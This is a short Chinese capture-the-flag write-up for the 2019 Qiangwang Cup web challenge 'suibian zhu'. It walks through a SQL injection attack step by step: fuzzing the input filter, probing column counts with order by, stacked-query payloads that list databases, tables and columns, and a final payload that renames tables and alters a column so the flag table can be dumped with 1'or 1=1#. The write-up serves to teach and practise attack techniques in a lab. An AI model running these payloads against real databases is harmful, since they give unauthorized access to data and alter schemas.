CTF-Web-强网杯 2019-随便注
2024-10-18 17:11:49
题目链接
FUZZ测试
fuzz出,order by测出数据库查询列数2列,注释符号#,select|update|delete|drop|insert|where|被过滤,尝试堆叠注入
1’
1'order by 2 #
1'order by 3 #
堆叠注入
1';show databases;#
1';show tables;#
1';show columns from words;#
测试判断数据库查询语句为
select * from words where id=$_inject;
页面显示的‘haha’为数据库表中id=1的值,现在可以将存有flag值的表名称改为words,并将列名flag改为id,查询语句如下,最后用or 1=1# 查出flag
1';rename tables `words` to `words1`;rename tables `1919810931114514` to `words`;alter table `words` change `flag` `id` varchar(100);#
1'or 1=1#
最新文章
- HDU 5102 The K-th Distance(模拟)
- Linux内核创建一个新进程
- C#学习系列-类与结构的区别
- 报错:LINQ to Entities 不识别方法
- NBOJv2 1034 Salary Inequity(DFS序+线段树区间更新区间(最值)查询)
- EditText图文混排
- [ActionScript 3.0] AS3 绘制正四面体(线条)
- Ubuntu 下一个可用的音乐播放器
- 【风马一族_Android】Android 从命令行界面获取手机信息
- 【MSP是什么】MSP认证之项目群管理
- CSS3 美女动画相框
- 使用angular-ui-router替代ng-router
- XSS DOM 测试
- com.mysql.cj.core.exceptions.InvalidConnectionAttributeException: The server time zone value '��� mysql-installer-community-8.0.15.0
- 【mysql】mysql常用语句
- 搭建WordPress 个人博客
- @ModelAttribute注解(SpringMVC)
- react-native组件封装与传值
- 20170918-00-(代理ip检验)
- 常用的 Windows 键